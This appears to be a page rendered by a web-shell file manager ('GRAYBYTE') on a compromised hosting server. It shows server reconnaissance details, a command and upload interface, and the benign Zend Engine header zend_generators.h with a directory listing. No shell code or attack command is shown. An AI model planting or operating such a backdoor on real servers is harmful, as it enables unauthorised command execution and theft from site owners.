GRAYBYTE WORDPRESS FILE MANAGER6732

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/cpanel/ea-php72/root/usr/include/php/Zend/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/cpanel/ea-php72/root/usr/include/php/Zend//zend_generators.h
/*
   +----------------------------------------------------------------------+
   | Zend Engine                                                          |
   +----------------------------------------------------------------------+
   | Copyright (c) 1998-2018 Zend Technologies Ltd. (http://www.zend.com) |
   +----------------------------------------------------------------------+
   | This source file is subject to version 2.00 of the Zend license,     |
   | that is bundled with this package in the file LICENSE, and is        |
   | available through the world-wide-web at the following url:           |
   | http://www.zend.com/license/2_00.txt.                                |
   | If you did not receive a copy of the Zend license and are unable to  |
   | obtain it through the world-wide-web, please send a note to          |
   | license@zend.com so we can mail you a copy immediately.              |
   +----------------------------------------------------------------------+
   | Authors: Nikita Popov <nikic@php.net>                                |
   |          Bob Weinand <bobwei9@hotmail.com>                           |
   +----------------------------------------------------------------------+
*/

/* $Id$ */

#ifndef ZEND_GENERATORS_H
#define ZEND_GENERATORS_H

BEGIN_EXTERN_C()

extern ZEND_API zend_class_entry *zend_ce_generator;
extern ZEND_API zend_class_entry *zend_ce_ClosedGeneratorException;

typedef struct _zend_generator_node zend_generator_node;
typedef struct _zend_generator zend_generator;

/* The concept of `yield from` exposes problems when accessed at different levels of the chain of delegated generators. We need to be able to reference the currently executed Generator in all cases and still being able to access the return values of finished Generators.
 * The solution to this problem is a doubly-linked tree, which all Generators referenced in maintain a reference to. It should be impossible to avoid walking the tree in all cases. This way, we only need tree walks from leaf to root in case where some part of the `yield from` chain is passed to another `yield from`. (Update of leaf node pointer and list of multi-children nodes needed when leaf gets a child in direct path from leaf to root node.) But only in that case, which should be a fairly rare case (which is then possible, but not totally cheap).
 * The root of the tree is then the currently executed Generator. The subnodes of the tree (all except the root node) are all Generators which do `yield from`. Each node of the tree knows a pointer to one leaf descendant node. Each node with multiple children needs a list of all leaf descendant nodes paired with pointers to their respective child node. (The stack is determined by leaf node pointers) Nodes with only one child just don't need a list, there it is enough to just have a pointer to the child node. Further, leaf nodes store a pointer to the root node.
 * That way, when we advance any generator, we just need to look up a leaf node (which all have a reference to a root node). Then we can see at the root node whether current Generator is finished. If it isn't, all is fine and we can just continue. If the Generator finished, there will be two cases. Either it is a simple node with just one child, then go down to child node. Or it has multiple children and we now will remove the current leaf node from the list of nodes (unnecessary, is microoptimization) and go down to the child node whose reference was paired with current leaf node. Child node is then removed its parent reference and becomes new top node. Or the current node references the Generator we're currently executing, then we can continue from the YIELD_FROM opcode. When a node referenced as root node in a leaf node has a parent, then we go the way up until we find a root node without parent.
 * In case we go into a new `yield from` level, a node is created on top of current root and becomes the new root. Leaf node needs to be updated with new root node then.
 * When a Generator referenced by a node of the tree is added to `yield from`, that node now gets a list of children (we need to walk the descendants of that node and nodes of the tree of the other Generator down to the first multi-children node and copy all the leaf node pointers from there). In case there was no multi-children node (linear tree), we just add a pair (pointer to leaf node, pointer to child node), with the child node being in a direct path from leaf to this node.
 */

struct _zend_generator_node {
	zend_generator *parent; /* NULL for root */
	uint32_t children;
	union { /* HashTable / hard coded array for faster access */
		HashTable ht; /* if > 4 children */
		struct {
			zend_generator *leaf;
			zend_generator *child;
		} array[4]; /* if <= 4 children */
	} child;
	union {
		zend_generator *leaf; /* if > 0 children */
		zend_generator *root; /* if 0 children */
	} ptr;
};

struct _zend_generator {
	zend_object std;

	zend_object_iterator *iterator;

	/* The suspended execution context. */
	zend_execute_data *execute_data;

	/* Frozen call stack for "yield" used in context of other calls */
	zend_execute_data *frozen_call_stack;

	/* Current value */
	zval value;
	/* Current key */
	zval key;
	/* Return value */
	zval retval;
	/* Variable to put sent value into */
	zval *send_target;
	/* Largest used integer key for auto-incrementing keys */
	zend_long largest_used_integer_key;

	/* Values specified by "yield from" to yield from this generator.
	 * This is only used for arrays or non-generator Traversables.
	 * This zval also uses the u2 structure in the same way as
	 * by-value foreach. */
	zval values;

	/* Node of waiting generators when multiple "yield from" expressions
	 * are nested. */
	zend_generator_node node;

	/* Fake execute_data for stacktraces */
	zend_execute_data execute_fake;

	/* ZEND_GENERATOR_* flags */
	zend_uchar flags;

	zval *gc_buffer;
	uint32_t gc_buffer_size;
};

static const zend_uchar ZEND_GENERATOR_CURRENTLY_RUNNING = 0x1;
static const zend_uchar ZEND_GENERATOR_FORCED_CLOSE      = 0x2;
static const zend_uchar ZEND_GENERATOR_AT_FIRST_YIELD    = 0x4;
static const zend_uchar ZEND_GENERATOR_DO_INIT           = 0x8;

void zend_register_generator_ce(void);
ZEND_API void zend_generator_close(zend_generator *generator, zend_bool finished_execution);
ZEND_API void zend_generator_resume(zend_generator *generator);

ZEND_API void zend_generator_restore_call_stack(zend_generator *generator);
ZEND_API zend_execute_data* zend_generator_freeze_call_stack(zend_execute_data *execute_data);

void zend_generator_yield_from(zend_generator *generator, zend_generator *from);
ZEND_API zend_execute_data *zend_generator_check_placeholder_frame(zend_execute_data *ptr);

ZEND_API zend_generator *zend_generator_update_current(zend_generator *generator, zend_generator *leaf);
static zend_always_inline zend_generator *zend_generator_get_current(zend_generator *generator)
{
	zend_generator *leaf;
	zend_generator *root;

	if (EXPECTED(generator->node.parent == NULL)) {
		/* we're not in yield from mode */
		return generator;
	}

	leaf = generator->node.children ? generator->node.ptr.leaf : generator;
	root = leaf->node.ptr.root;

	if (EXPECTED(root->execute_data && root->node.parent == NULL)) {
		/* generator still running */
		return root;
	}

	return zend_generator_update_current(generator, leaf);
}

END_EXTERN_C()

#endif

/*
 * Local variables:
 * tab-width: 4
 * c-basic-offset: 4
 * indent-tabs-mode: t
 * End:
 * vim600: sw=4 ts=4 fdm=marker
 * vim<600: sw=4 ts=4
 */

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 23 2025 03:25:13
root / root
0755
zend.h
12.573 KB
May 23 2025 03:25:45
root / root
0644
zend_API.h
59.078 KB
May 23 2025 03:25:45
root / root
0644
zend_alloc.h
18.844 KB
May 23 2025 03:25:45
root / root
0644
zend_alloc_sizes.h
2.714 KB
May 23 2025 03:25:45
root / root
0644
zend_arena.h
3.707 KB
May 23 2025 03:25:45
root / root
0644
zend_ast.h
8.265 KB
May 23 2025 03:25:45
root / root
0644
zend_bitset.h
6.931 KB
May 23 2025 03:25:45
root / root
0644
zend_build.h
1.734 KB
May 23 2025 03:25:45
root / root
0644
zend_builtin_functions.h
1.628 KB
May 23 2025 03:25:45
root / root
0644
zend_closures.h
2.086 KB
May 23 2025 03:25:45
root / root
0644
zend_compile.h
32.722 KB
May 23 2025 03:25:45
root / root
0644
zend_config.h
0.104 KB
May 23 2025 03:25:47
root / root
0644
zend_config.nw.h
2.494 KB
May 23 2025 03:25:45
root / root
0644
zend_constants.h
5.898 KB
May 23 2025 03:25:45
root / root
0644
zend_dtrace.h
2.052 KB
May 23 2025 03:25:45
root / root
0644
zend_errors.h
2.16 KB
May 23 2025 03:25:45
root / root
0644
zend_exceptions.h
3.865 KB
May 23 2025 03:25:45
root / root
0644
zend_execute.h
14.173 KB
May 23 2025 03:25:45
root / root
0644
zend_extensions.h
5.979 KB
May 23 2025 03:25:45
root / root
0644
zend_float.h
15.334 KB
May 23 2025 03:25:45
root / root
0644
zend_gc.h
5.02 KB
May 23 2025 03:25:46
root / root
0644
zend_generators.h
7.387 KB
May 23 2025 03:25:46
root / root
0644
zend_globals.h
7.182 KB
May 23 2025 03:25:46
root / root
0644
zend_globals_macros.h
2.763 KB
May 23 2025 03:25:46
root / root
0644
zend_hash.h
33.75 KB
May 23 2025 03:25:46
root / root
0644
zend_highlight.h
2.373 KB
May 23 2025 03:25:46
root / root
0644
zend_inheritance.h
1.961 KB
May 23 2025 03:25:46
root / root
0644
zend_ini.h
9.482 KB
May 23 2025 03:25:46
root / root
0644
zend_ini_parser.h
2.688 KB
May 23 2025 03:25:47
root / root
0644
zend_ini_scanner.h
1.987 KB
May 23 2025 03:25:47
root / root
0644
zend_ini_scanner_defs.h
0.219 KB
May 23 2025 03:25:46
root / root
0644
zend_interfaces.h
4.324 KB
May 23 2025 03:25:46
root / root
0644
zend_istdiostream.h
1.659 KB
May 23 2025 03:25:46
root / root
0644
zend_iterators.h
3.554 KB
May 23 2025 03:25:46
root / root
0644
zend_language_parser.h
7.957 KB
May 23 2025 03:25:47
root / root
0644
zend_language_scanner.h
2.773 KB
May 23 2025 03:25:47
root / root
0644
zend_language_scanner_defs.h
0.29 KB
May 23 2025 03:25:46
root / root
0644
zend_list.h
3.218 KB
May 23 2025 03:25:46
root / root
0644
zend_llist.h
3.859 KB
May 23 2025 03:25:46
root / root
0644
zend_long.h
4.356 KB
May 23 2025 03:25:46
root / root
0644
zend_modules.h
4.836 KB
May 23 2025 03:25:46
root / root
0644
zend_multibyte.h
4.884 KB
May 23 2025 03:25:46
root / root
0644
zend_multiply.h
9.425 KB
May 23 2025 03:25:47
root / root
0644
zend_object_handlers.h
9.223 KB
May 23 2025 03:25:47
root / root
0644
zend_objects.h
1.881 KB
May 23 2025 03:25:47
root / root
0644
zend_objects_API.h
3.479 KB
May 23 2025 03:25:47
root / root
0644
zend_operators.h
30.759 KB
May 23 2025 03:25:47
root / root
0644
zend_portability.h
14.973 KB
May 23 2025 03:25:47
root / root
0644
zend_ptr_stack.h
4.276 KB
May 23 2025 03:25:47
root / root
0644
zend_range_check.h
3.076 KB
May 23 2025 03:25:47
root / root
0644
zend_signal.h
4.055 KB
May 23 2025 03:25:47
root / root
0644
zend_smart_str.h
5.132 KB
May 23 2025 03:25:47
root / root
0644
zend_smart_str_public.h
1.396 KB
May 23 2025 03:25:47
root / root
0644
zend_smart_string.h
4.892 KB
May 23 2025 03:25:47
root / root
0644
zend_smart_string_public.h
1.518 KB
May 23 2025 03:25:47
root / root
0644
zend_sort.h
1.756 KB
May 23 2025 03:25:47
root / root
0644
zend_stack.h
2.463 KB
May 23 2025 03:25:47
root / root
0644
zend_stream.h
3.377 KB
May 23 2025 03:25:47
root / root
0644
zend_string.h
14.969 KB
May 23 2025 03:25:47
root / root
0644
zend_strtod.h
1.969 KB
May 23 2025 03:25:47
root / root
0644
zend_strtod_int.h
3.563 KB
May 23 2025 03:25:47
root / root
0644
zend_ts_hash.h
6.563 KB
May 23 2025 03:25:47
root / root
0644
zend_type_info.h
3.177 KB
May 23 2025 03:25:47
root / root
0644
zend_types.h
33.044 KB
May 23 2025 03:25:47
root / root
0644
zend_variables.h
4.67 KB
May 23 2025 03:25:47
root / root
0644
zend_virtual_cwd.h
12.368 KB
May 23 2025 03:25:47
root / root
0644
zend_vm.h
1.978 KB
May 23 2025 03:25:47
root / root
0644
zend_vm_def.h
253.384 KB
May 23 2025 03:25:47
root / root
0644
zend_vm_execute.h
2.21 MB
May 23 2025 03:25:47
root / root
0644
zend_vm_opcodes.h
12.645 KB
May 23 2025 03:25:47
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF